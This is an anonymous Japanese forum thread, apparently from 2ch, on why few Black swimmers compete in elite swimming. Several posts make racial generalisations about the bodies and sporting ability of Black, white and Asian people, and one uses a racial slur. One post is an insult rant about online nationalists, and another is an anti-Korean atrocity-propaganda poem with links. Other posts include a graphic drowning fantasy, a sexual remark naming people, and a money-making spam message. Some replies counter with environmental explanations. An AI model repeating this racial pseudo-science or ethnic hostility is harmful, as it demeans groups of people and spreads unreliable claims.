0373第1のコース!名無しくん垢版2012/07/21(土) 20:30:24.87ID:A5JkuECI
>>372
潜水で75mは泳げると潜水自慢の俺。
長さ160mの人が入れる水中トンネルに押し込められる俺。
 「ひゃっ160m潜水? そんなの無理です!死んじゃう やめて!!」
しかし深呼吸する時間を与えられた後、入口のふたを閉められ強引にスタート! 
潜水したまま泳いで出口まで行き着かないと、息が出来ない状態にされる俺。

恐怖でもの凄い形相の俺。160m先の出口目指し潜水開始。
25mを通過・・・30m通過・・・40m通過・・・そして50m通過。  
苦しさは増すが出口まであと100m以上!・・・・恐怖でさらに顔が引き攣つる俺。
脇腹がヒクッヒクッしだし「ングッ ングッ」って息をこらえ続ける俺。 
苦しさで焦りだして出口目指してスピードアップする俺。

「ムヒィ〜 苦しい! 息を! 息をしたい」俺、そんな状態。
フォームは崩れてしまい、手脚をばたつかせながらも60mを過ぎ、いよいよ70m到達か?
しかしそこで、元スイマーの潜水自慢な俺は息こらえの限界に!!
肺に溜めていた息を「ボコッ ボコッ」と口と鼻から吐き出してしまい
ゴボゴボ音たてて空気の代わりに水で肺と気道の中を一杯にする俺。

「グゥヒィ〜 頼む! ここから出しくれ〜!!」
苦悶の表情を浮かべてもがき苦しみ、空気を求めトンネル内壁を掻きむしる俺。
やがて白眼剥きながら意識を失い、痙攣を繰り返して静かになる・・・・俺溺死。 
私だとこのように溺死してしまいますね。
0374第1のコース!名無しくん垢版2013/03/16(土) 18:34:34.12ID:ApwOXCL6
黒人さんは力強さを感じる
他方で白人さんはプヨプヨっぽいイメージがする
アジアンは筋肉云々よりタッハ足りない。
よって脂が程よくのった白人が理想的だξ
0375第1のコース!名無しくん垢版2013/10/07(月) 01:21:04.44ID:xxjBVZnz
ネトウヨとは・・・
釣り銭乞食敗戦民のヒキおたレイシスニート
人格に問題があるため社会に適応できない人種
そのため周囲に対して自分の存在を誇示するためのステータスが一切ない
唯一の拠り所が「自分は日本人」ということのみである為
ネット上で在日韓国・朝鮮人を叩いてわずかな優越感を得ることでアイデンティティを保っている

また昨今では嫌韓流思考が顕著でありネトウヨ自身が社会と接する機会が少ないこともあり、
「韓流ブームはステマ」と本気で信じている。
そのくせ「日本製」「メイドインジャパン」「国産」を低品質でも礼讃しステマするダブスタ木違い。
例:SAMSUNG叩き。GALAXY叩き。HYUNDAI叩き。ソフトバンク叩き。孫正義叩き。発送電分離叩き。再生可能エネルギー叩き。山本太郎叩き。
アシアナ航空叩き。潘基文叩き。ネクセン叩き。ハンコック叩き。クムホ叩き。ポスコ叩き。K-POP叩き。マッコリ叩き。チャングム叩き。グンソク叩き。崔洋一叩き。テポドン叩き。

「敗戦」を「終戦」に改ざんし「敗戦国民」である現実から歴史ねつ造し名誉白人気取りのアジアの裏切り者
その思考が右翼にも似ている為、ネトウヨと呼称される

@社会的地位:最下層
A経済力:低収入、または無収入。
 高い収入を得る人間に対しては、例え在日以外にも異様なまでの敵対心を持つ。
例:マスコミNHK叩き。パチンコ叩き。中国叩き。グローバリズム叩き。TPP叩き。経団連叩き。リア充叩き。脱原発叩き。護憲叩き。生活保護叩き。年金者叩き。民主創価叩き。日教組叩き。しばき隊叩き。フェミ叩き。カルデロン叩き。多文化共生叩き。ピースボート叩き。
B対人関係:不得意。
 匿名の掲示板以外では何も話すことは出来ない。その分ネットには莫大なエネルギーと時間を費やす。
0378第1のコース!名無しくん垢版2014/09/14(日) 19:38:55.55ID:knWJuFvN
黒人が脂肪少なくて浮かないから水泳には向いてないとか言う馬鹿がいるが、
その理屈なら男子より女子の方が記録凄いはずだが?現実は?

NBAとかに言っているような長身の身体能力が高い黒人が本格的に水泳やれば
驚異的な世界記録が出るよ。
0379第1のコース!名無しくん垢版2014/09/28(日) 15:57:52.35ID:1E8J2Qq4
その証明はボビーしかいない!
0380第1のコース!名無しくん垢版2014/09/28(日) 15:58:43.23ID:1E8J2Qq4
格闘技は凄かった
0381第1のコース!名無しくん垢版2015/05/21(木) 00:54:01.31ID:4jkJNJCj
仙坂睦、橋本良郎爺さんとSEX
0382名無しさん@そうだ選挙に行こう! Go to vote!垢版2016/07/10(日) 09:55:18.08ID:AXypph4P
ブラジル
0383第1のコース!名無しくん垢版2016/07/23(土) 10:30:23.37ID:U94rfcNq
重さ含めた筋肉のつきかただよ
黄色人種は明らかに筋肉がつきにくくて大抵のスポーツで不利だけど、
水泳だと黒人よりは有利
ただし白人のほうがもっと有利
0384第1のコース!名無しくん垢版2016/07/23(土) 17:54:33.48ID:ESqwC+k+
骨格の問題だと思うがね。
黒人は手足が長いから走るのは得意。
長さの違う棒を振り回すと長い方が遠心力が働く、及び、先端の加速度&スピードも長い方が大きくなる。
だから、スピードが出る。パンチが強い。

では、加速出来ない状態では?
止まった状態から動かす場合は長い方は逆テコの原理が働いてしまう。
此れは同じ重さのトンカチでも柄が長い方が持ち上げにくい事で実感出来る。
だから、静止状態からスタートする重量上げやパワーリフティングは、意外な事に余り黒人のチャンプがいない。
水泳に黒人が少ないかより、リフティング競技で黒人チャンプが少ない事の方が意外でしょ。
水泳は環境の所為に出来てもリフティングは黒人一杯いるし、筋骨隆々なのにチャンプが少ない。
でも、考えてみればリフティングでは手足が短い方が有利になる事を考えれば納得出来る。
走るのに有利に働いた要素がデメリットとなって働いてくる。
(意外かもしれないがベンチプレスって日本人有利と言われていて日本人チャンプが結構いる)

ちなみに余談だが競馬で活躍する脚の長いアラブ馬、サラブレッドは山間や荷物引きではサッパリで小型なポニーの方が活躍する。

自動車だって山の不整地でジープよりフェラーリの方が早いかと言えば、そうでは無い。

何が言いたいかと言えば、状態に適した形状が有って成績が良いので有って、成績が良いから他の状態でも、有利になるとは限ら無い。

50年前なら兎も角、未だに黒人の水泳選手が活躍しないのは、やっぱり、体格的にマッチしていない可能性が高いと思う。
0385第1のコース!名無しくん垢版2016/07/23(土) 21:20:32.81ID:POOA1Idc
黒人は足が長いし、ケツが出てて
骨盤の角度がついちゃっる。
足が沈み易くストリームラインが苦手。
伏浮きも苦手だろうね。

黒人だからといって体全体が沈むわけではない。
超肥満体でもない限り、息を吐けば誰でも沈む。
0386第1のコース!名無しくん垢版2016/08/04(木) 23:33:31.15ID:A68jtQAp
本気になったら強いだろうけどな
0387第1のコース!名無しくん垢版2016/08/05(金) 11:25:37.59ID:Zn5Xap5e
未だに筋肉ガーとか言ってる間抜けが多いので
マジレスすると、黒人が多い貧困アフリカではお金のかかるプール施設はないし、ましてや競泳トレーニングできる環境などあるはずない
競泳大国アメリカでさえ黒人人口は13%程度(白人80%)なので白人が多くなるのは当たり前
それでも黒人選手オリンピックに何人か出るよ、アメリカ代表で数人いるはず
シドニーでムサンバニという黒人選手が1フリ泳いだけど、大会半年前に初めて泳いで、しかもホテルのプールとかで練習してたレベル
50mプールは本番で初めて見たというレベルで激遅タイムだったけど
その後猛練習して100mを57秒で泳いでんだよ、才能なかったら、大人になって初めてここまでタイム伸びない
黒人とかって関係ないと思うよ
0388第1のコース!名無しくん垢版2016/08/07(日) 12:06:01.22ID:xfm1I7SU
筋肉がつきすぎると泳げなくなるのならボディービルダーはまったく泳げないってことになるよな?
そんな話は聞いたことないぞ。
0389第1のコース!名無しくん垢版2016/08/07(日) 12:21:40.47ID:vM5bDd6Z
女4継のアメリカ1泳の土人、速かったな。
豪州はキャンとベラがいないと負けてた。
0390第1のコース!名無しくん垢版2016/08/09(火) 14:01:47.96ID:tDp5Rtwf
大昔、ユニバーシアードで予選8コースが黒人選手で6・7コースの選手は棄権してた。ひょっとしたらこれが噂の差別なのか?と思った。
0393第1のコース!名無しくん垢版2016/08/12(金) 23:22:50.78ID:koDJLjAG
黒人を差別しているせいで少数しかいないのは有名やで。

白人はすぐにプールを出たがる!
0395第1のコース!名無しくん垢版2016/08/17(水) 22:43:54.22ID:yDdGOsRq
人種別記録

男子50M自由形

白人 20秒91
黒人 21秒40←ロンドン五輪50M自由形銀メダル
黄人 21秒88

女子50M自由形

白人 23秒73
黒人 24秒09←リオ五輪50M自由形銀メダル
黄人 24秒51(1994)←楽靖宜(ドーピング)
0396第1のコース!名無しくん垢版2016/08/17(水) 22:46:31.35ID:yDdGOsRq
訂正

男子

黒人 21秒40←ロンドン五輪50M自由形銀メダリスト
0397第1のコース!名無しくん垢版2016/08/17(水) 22:48:49.31ID:yDdGOsRq
パク・テファン(ドーピング)
孫楊を筆頭に中国競泳陣はドーピング
萩野は200M自由形7位

黄人は黒人を馬鹿にできる立場ではない
0398第1のコース!名無しくん垢版2016/08/23(火) 21:44:43.64ID:v5+dX739
>>395
体型や体質的に黒人は速く泳げないとか言われていたけど
こういう数値見せられると、そうでもなさそうだね・・・

人類自体が元々泳ぐために適応した生き物じゃないから
黒人と言えど陸上競技ほどのアドバンテージはないかもしれないけど

環境さえ与えられれば、身体能力差で余裕でカバーしてくる範囲だね
0400第1のコース!名無しくん垢版2016/10/02(日) 23:30:19.74ID:gn+Wqlun
黒人が本格参戦したら競泳なんてひとたまりもないのは分かりきってる
でもそんな日はそうそう来ないだろうから日本のお家芸としてこれからも頑張ってほしい

黒人が参入してない競技の関係者や選手は神に感謝しないとね
今後もお願いしますってね
0401第1のコース!名無しくん垢版2016/10/03(月) 02:34:29.33ID:jRqLziAV
名前しか知らなかったけど、マナドゥってなんかアフリカっぽい響きの名前だけど、ググったら普通に白人だった
西アフリカからの移民の二代目かそんなのかと思ってた
さすがにサッカーフランス代表みたいに、フランス競泳界が黒人や中東系(ってジダン兄さん位か)頼みになる日はまだ来ないか
0402第1のコース!名無しくん垢版2017/07/29(土) 00:46:14.46ID:Je31SHEY
リオの金メダリストアメリカのマニュエル今大会3個目の金取ったね

マニュエルが混合リレーのアンカー勤め金取った時、チームメイトの白人の男子選手が
女子の白人選手とは手を取り合って喜んでたのに、マニュエルに対してはすごいよそよそしい態度とってたのが印象的だった
0403第1のコース!名無しくん垢版2017/07/29(土) 08:48:24.41ID:unsXE2rg
マジかよー、そこまで差別されてるのか、よくそんな環境でやれるな
差別することで自分達の舞台を黒人に奪われないようにしているのもあるのかも
0404第1のコース!名無しくん垢版2017/09/03(日) 20:42:29.34ID:OVXcBsFm
悪いひとたちがやって来て
みんなを殺した

理由なんて簡単さ
そこに弱いひとたちがいたから

女達は犯され
老人と子供は燃やされた

悪いひとたちはその土地に
家を建てて子供を生んだ

そして街ができ
悪いひとたちの子孫は増え続けた


朝鮮進駐軍 関東大震災 日本人虐殺
https://goo.gl/1ntWvZ
https://youtu.be/D0vgxFC04JQ
https://goo.gl/h1o4eV
https://www.youtube.com/watch?v=sYsrzIjKJBc
http://yh649490005.xsrv.jp/public_html/
0405第1のコース!名無しくん垢版2017/09/18(月) 09:20:17.61ID:dr67Cqfz
        ,___ ,..-──....、
       /:::::::::`'::::::::::::::::::::::::ヽ
      /::::::::::::::::::::::::::::::::::::::::::::::\
     ,/:::::::::::::;;;_;:-、::::::::::::::::::::::::::::::l
     l::::::::::/   `ー-;::::::::::::::::::::::ソ
     |::::::/         `ー'ヾ:::::r'
     ゝ:r'            `i;;:}
    r'`;;ト_〓〓ニ、  ,ニ〓〓_ _r'"7     初夜の股間の疼きを想わない者は泣きながらこのスレを閉じなさい!
    {6 'l┃ーo-、l━l ,-oー テ''ぃル
    _ゝ.| |   ̄ ┃┃  ̄ .ノ !/              |  \ \
    // ))))─'''ノ  `ー─''" |'                |
   /_ ⊂ノ   ' ・ ・ '     /            | ヽヽ .|\
 / /   :、   皿皿皿   .イ     i 、、 | ヽヽ |\   |  \
 \ \    ..    ̄   /  ド ド |ヽ   |\  |    |
/ /\ `ー---`  ._..  '     
/ / `ー─-、      ⌒\
/       ノ      />  >
        /  ×  / 6三ノ
       /  /U\ \
―    /  ん、  \ \
――  (__ (   >  )
⌒ヽ   ’ ・`し' / /
  人, ’ ’, ( ̄ /
Y⌒ヽ)⌒ヽ、 )  |
         \_つ
0406第1のコース!名無しくん垢版2018/02/27(火) 13:16:15.83ID:JphmRhtv
僕の知り合いの知り合いができた自宅で稼げる方法
役に立つかもしれません
グーグル検索⇒『金持ちになりたい 鎌野介メソッド』

LA6M4
0407第1のコース!名無しくん垢版2018/06/21(木) 13:13:54.52ID:sfsbhC+W
猫って水が嫌いで、元々の生息域はアフリカ。
そしてアフリカンも水泳が苦手。
アフリカに何か水に触れたら致命的な要因があって、忌避する進化を遂げたんじゃないかと予想w
(じゃあカバは?って言われても知らんけど)
レスを投稿する


ニューススポーツなんでも実況